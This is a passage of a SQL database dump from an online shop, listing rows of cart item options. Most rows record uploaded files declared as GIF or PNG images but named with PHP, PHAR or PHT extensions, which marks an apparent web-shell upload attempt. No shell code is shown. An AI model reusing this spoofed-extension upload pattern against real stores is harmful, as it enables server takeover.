(426, 414, 2062, 'info_buyRequest', '{\"options\":{\"739\":{\"type\":\"image\\/gif\",\"title\":\"739index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/3\\/739index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/3\\/739index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/3\\/739index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(427, 415, 2062, 'info_buyRequest', '{\"options\":{\"699\":{\"type\":\"image\\/gif\",\"title\":\"699index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/9\\/699index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/9\\/699index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/9\\/699index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(428, 416, 2062, 'info_buyRequest', '{\"options\":{\"5952900\":{\"type\":\"image\\/gif\",\"title\":\"595290index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595290index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.php\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5952901\":{\"type\":\"image\\/gif\",\"title\":\"595290index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595290index.php7\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.php7\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.php7\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5952902\":{\"type\":\"image\\/gif\",\"title\":\"595290index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595290index.php8\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.php8\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.php8\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5952903\":{\"type\":\"image\\/gif\",\"title\":\"595290index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595290index.phar\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.phar\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.phar\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5952904\":{\"type\":\"image\\/gif\",\"title\":\"595290index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595290index.pht\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.pht\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595290index.pht\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"}},\"qty\":1}'),
(429, 417, 2059, 'info_buyRequest', '{\"options\":{\"5956900\":{\"type\":\"image\\/gif\",\"title\":\"595690index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595690index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.php\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956901\":{\"type\":\"image\\/gif\",\"title\":\"595690index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595690index.php7\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.php7\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.php7\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956902\":{\"type\":\"image\\/gif\",\"title\":\"595690index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595690index.php8\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.php8\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.php8\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956903\":{\"type\":\"image\\/gif\",\"title\":\"595690index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595690index.phar\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.phar\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.phar\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956904\":{\"type\":\"image\\/gif\",\"title\":\"595690index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595690index.pht\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.pht\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595690index.pht\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"}},\"qty\":1}'),
(430, 418, 2054, 'info_buyRequest', '{\"options\":{\"5956930\":{\"type\":\"image\\/gif\",\"title\":\"595693index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595693index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.php\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956931\":{\"type\":\"image\\/gif\",\"title\":\"595693index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595693index.php7\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.php7\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.php7\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956932\":{\"type\":\"image\\/gif\",\"title\":\"595693index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595693index.php8\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.php8\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.php8\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956933\":{\"type\":\"image\\/gif\",\"title\":\"595693index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595693index.phar\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.phar\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.phar\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"},\"5956934\":{\"type\":\"image\\/gif\",\"title\":\"595693index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/595693index.pht\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.pht\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/595693index.pht\",\"size\":377,\"width\":15361,\"height\":28735,\"secret_key\":\"222bb94c2aac6f0ee609\"}},\"qty\":1}'),
(431, 419, 2062, 'info_buyRequest', '{\"options\":{\"599\":{\"type\":\"image\\/gif\",\"title\":\"599index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/599index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/599index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/599index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(432, 420, 2062, 'info_buyRequest', '{\"options\":{\"751\":{\"type\":\"image\\/gif\",\"title\":\"751index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/5\\/751index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/5\\/751index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/5\\/751index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(433, 421, 2062, 'info_buyRequest', '{\"options\":{\"590\":{\"type\":\"image\\/gif\",\"title\":\"590index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/590index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/590index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/590index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(434, 422, 2062, 'info_buyRequest', '{\"options\":{\"976\":{\"type\":\"image\\/gif\",\"title\":\"976index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/7\\/976index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/7\\/976index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/7\\/976index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(435, 423, 2062, 'info_buyRequest', '{\"options\":{\"107\":{\"type\":\"image\\/gif\",\"title\":\"107index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/0\\/107index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/0\\/107index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/0\\/107index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(436, 424, 2062, 'info_buyRequest', '{\"options\":{\"806\":{\"type\":\"image\\/gif\",\"title\":\"806index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/0\\/806index_1.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/0\\/806index_1.php\",\"order_path\":\"custom_options\\/quote\\/8\\/0\\/806index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(437, 425, 2062, 'info_buyRequest', '{\"options\":{\"809\":{\"type\":\"image\\/gif\",\"title\":\"809index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/0\\/809index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/0\\/809index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/0\\/809index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(438, 426, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(439, 427, 2062, 'info_buyRequest', '{\"options\":{\"198\":{\"type\":\"image\\/gif\",\"title\":\"198index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/9\\/198index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/9\\/198index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/9\\/198index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(440, 428, 2062, 'info_buyRequest', '{\"options\":{\"154\":{\"type\":\"image\\/gif\",\"title\":\"154index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/5\\/154index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/5\\/154index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/5\\/154index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(441, 429, 2062, 'info_buyRequest', '{\"options\":{\"453\":{\"type\":\"image\\/gif\",\"title\":\"453index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/5\\/453index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/5\\/453index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/5\\/453index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(442, 430, 2062, 'info_buyRequest', '{\"options\":{\"502\":{\"type\":\"image\\/gif\",\"title\":\"502index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/0\\/502index_1.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/0\\/502index_1.php\",\"order_path\":\"custom_options\\/quote\\/5\\/0\\/502index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(443, 431, 2062, 'info_buyRequest', '{\"options\":{\"324\":{\"type\":\"image\\/gif\",\"title\":\"324index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/2\\/324index_1.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/2\\/324index_1.php\",\"order_path\":\"custom_options\\/quote\\/3\\/2\\/324index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(444, 432, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"gu9tpfmh.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/g\\/u\\/gu9tpfmh.php\",\"quote_path\":\"custom_options\\/quote\\/g\\/u\\/gu9tpfmh.php\",\"order_path\":\"custom_options\\/quote\\/g\\/u\\/gu9tpfmh.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(445, 433, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"5xc70mmp.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/x\\/5xc70mmp.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/x\\/5xc70mmp.php\",\"order_path\":\"custom_options\\/quote\\/5\\/x\\/5xc70mmp.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(446, 434, 2062, 'info_buyRequest', '{\"options\":{\"883\":{\"type\":\"image\\/gif\",\"title\":\"883index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/8\\/883index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/8\\/883index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/8\\/883index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(447, 435, 2062, 'info_buyRequest', '{\"options\":{\"2994740\":{\"type\":\"image\\/gif\",\"title\":\"299474index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299474index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2994741\":{\"type\":\"image\\/gif\",\"title\":\"299474index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299474index.php7\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.php7\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2994742\":{\"type\":\"image\\/gif\",\"title\":\"299474index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299474index.php8\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.php8\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2994743\":{\"type\":\"image\\/gif\",\"title\":\"299474index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299474index.phar\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.phar\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2994744\":{\"type\":\"image\\/gif\",\"title\":\"299474index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299474index.pht\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.pht\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299474index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(448, 436, 2054, 'info_buyRequest', '{\"options\":{\"2996300\":{\"type\":\"image\\/gif\",\"title\":\"299630index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299630index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2996301\":{\"type\":\"image\\/gif\",\"title\":\"299630index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299630index.php7\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.php7\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2996302\":{\"type\":\"image\\/gif\",\"title\":\"299630index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299630index.php8\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.php8\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2996303\":{\"type\":\"image\\/gif\",\"title\":\"299630index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299630index.phar\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.phar\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2996304\":{\"type\":\"image\\/gif\",\"title\":\"299630index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299630index.pht\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.pht\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299630index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(449, 437, 2059, 'info_buyRequest', '{\"options\":{\"2991700\":{\"type\":\"image\\/gif\",\"title\":\"299170index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299170index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2991701\":{\"type\":\"image\\/gif\",\"title\":\"299170index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299170index.php7\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.php7\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2991702\":{\"type\":\"image\\/gif\",\"title\":\"299170index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299170index.php8\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.php8\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2991703\":{\"type\":\"image\\/gif\",\"title\":\"299170index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299170index.phar\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.phar\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"2991704\":{\"type\":\"image\\/gif\",\"title\":\"299170index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/9\\/299170index.pht\",\"quote_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.pht\",\"order_path\":\"custom_options\\/quote\\/2\\/9\\/299170index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(450, 438, 2062, 'info_buyRequest', '{\"options\":{\"373\":{\"type\":\"image\\/gif\",\"title\":\"373index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/7\\/373index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/7\\/373index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/7\\/373index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}');
INSERT INTO `quote_item_option` (`option_id`, `item_id`, `product_id`, `code`, `value`) VALUES
(451, 439, 2062, 'info_buyRequest', '{\"options\":{\"529\":{\"type\":\"image\\/gif\",\"title\":\"529index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/2\\/529index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/2\\/529index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/2\\/529index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(452, 440, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"4rt1v5xt.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/r\\/4rt1v5xt.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/r\\/4rt1v5xt.php\",\"order_path\":\"custom_options\\/quote\\/4\\/r\\/4rt1v5xt.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(453, 441, 2062, 'info_buyRequest', '{\"options\":{\"539\":{\"type\":\"image\\/gif\",\"title\":\"539index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/3\\/539index_1.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/3\\/539index_1.php\",\"order_path\":\"custom_options\\/quote\\/5\\/3\\/539index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(454, 442, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"cuktroar.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/u\\/cuktroar.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/u\\/cuktroar.php\",\"order_path\":\"custom_options\\/quote\\/c\\/u\\/cuktroar.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(455, 443, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"mgfqm47v.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/m\\/g\\/mgfqm47v.php\",\"quote_path\":\"custom_options\\/quote\\/m\\/g\\/mgfqm47v.php\",\"order_path\":\"custom_options\\/quote\\/m\\/g\\/mgfqm47v.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(456, 444, 2062, 'info_buyRequest', '{\"options\":{\"215\":{\"type\":\"image\\/gif\",\"title\":\"215index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/1\\/215index_1.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/1\\/215index_1.php\",\"order_path\":\"custom_options\\/quote\\/2\\/1\\/215index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(457, 445, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"qx4rav36.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/q\\/x\\/qx4rav36.php\",\"quote_path\":\"custom_options\\/quote\\/q\\/x\\/qx4rav36.php\",\"order_path\":\"custom_options\\/quote\\/q\\/x\\/qx4rav36.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(458, 446, 2062, 'info_buyRequest', '{\"options\":{\"856\":{\"type\":\"image\\/gif\",\"title\":\"856index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/5\\/856index_2.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/5\\/856index_2.php\",\"order_path\":\"custom_options\\/quote\\/8\\/5\\/856index_2.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
